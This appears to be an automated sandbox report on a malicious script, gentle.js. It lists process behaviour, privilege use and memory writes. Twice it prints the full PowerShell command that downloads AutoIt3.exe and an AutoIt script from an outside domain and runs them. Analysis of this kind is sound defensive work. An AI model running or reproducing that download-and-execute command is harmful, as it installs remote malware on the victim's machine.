Analysis Overview
SHA256
4dce8991fb2942cb8443aba697311072aa25fc61b4b4186a54e7956c2bec6799
Threat Level: Shows suspicious behavior
The file gentle.js was found to be: Shows suspicious behavior.
Malicious Activity Summary
Checks computer location settings
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-01 21:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-01 21:26
Reported
2023-11-01 21:29
Platform
win7-20231023-en
Max time kernel
118s
Max time network
122s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1632 wrote to memory of 3040 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1632 wrote to memory of 3040 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1632 wrote to memory of 3040 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\gentle.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351/msikrxeiths' -OutFile 'krxeiths.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'krxeiths.au3'"
Network
Files
memory/3040-4-0x000000001B2B0000-0x000000001B592000-memory.dmp
memory/3040-5-0x0000000002290000-0x0000000002298000-memory.dmp
memory/3040-6-0x000007FEF4FD0000-0x000007FEF596D000-memory.dmp
memory/3040-7-0x000007FEF4FD0000-0x000007FEF596D000-memory.dmp
memory/3040-8-0x00000000026F0000-0x0000000002770000-memory.dmp
memory/3040-10-0x00000000026F0000-0x0000000002770000-memory.dmp
memory/3040-9-0x00000000026F0000-0x0000000002770000-memory.dmp
memory/3040-11-0x00000000026F0000-0x0000000002770000-memory.dmp
memory/3040-12-0x000007FEF4FD0000-0x000007FEF596D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-11-01 21:26
Reported
2023-11-01 21:29
Platform
win10v2004-20231023-en
Max time kernel
11s
Max time network
22s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4328 wrote to memory of 4716 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4328 wrote to memory of 4716 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\gentle.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351/msikrxeiths' -OutFile 'krxeiths.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'krxeiths.au3'"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |